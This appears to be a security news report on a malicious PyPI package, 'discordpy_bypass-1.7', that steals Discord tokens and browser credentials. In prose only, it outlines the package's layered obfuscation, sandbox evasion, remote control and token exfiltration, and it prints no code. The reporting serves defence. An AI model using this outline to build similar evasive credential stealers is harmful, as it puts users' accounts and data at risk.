PyPI Package Malware Targets Discord Users for Credential Theft

Hackers frequently exploit PyPI packages to inject malicious code into widely-used Python libraries, seeking vulnerabilities.

Recently, FortiGuard Labs cybersecurity researchers uncovered a malicious PyPI package, “discordpy_bypass-1.7,” targeting Discord users for credential theft. It was published on March 10th, 2024, and detected on March 12, 2024.

Theaos-authored package, consisting of seven versions with nearly identical traits, aims to obtain sensitive information from victims through persistence techniques, browser data extraction, and token harvesting.

PyPI Package Malware

The discordpy_bypass-1.7 PyPI package exhibits persistent cyber-attacks, employing malicious behavior aimed at extracting sensitive data from user systems. It employs code obfuscation and evasion techniques to evade analysis environments.

The code incorporates various checks to detect and terminate itself when running in a debug or analysis environment, indicating efforts to evade detection.

The coding involves three levels of obfuscation: base64 encoding the original Python code, encoding with obfuscation techniques, and compilation into an executable fetched from a remote URL by discordpy_bypass/discordpy_bypass.py.

The code also includes debugging environment detection techniques, such as checking for blacklisted processes, and comparing system IP/MAC addresses against blocklists.

It’s crucial for users to remain vigilant and proactive against such threats from the outset.

FortiGuard noted that to detect debugging environments, the code promptly verifies the system username, hostname, and hardware ID against blocklists.

Initialization of variables and setting up Socket.IO events for remote control and monitoring facilitate actions like file operations, directory navigation, and command execution.

Authentication tokens, particularly those from Discord, are prime targets for harvesting sensitive browser data, including login credentials, cookies, and web history.

The discordpy_bypass-1.7 code encrypts and validates any extracted tokens before uploading them to a remote server. This sophisticated threat operates stealthily, employing evasive measures to evade detection and analysis.

Awareness of such threats underscores the importance of remaining vigilant and implementing robust security measures. By understanding these risks, researchers can develop more secure systems, enhancing personal information and overall user safety through collective vigilance and collaboration.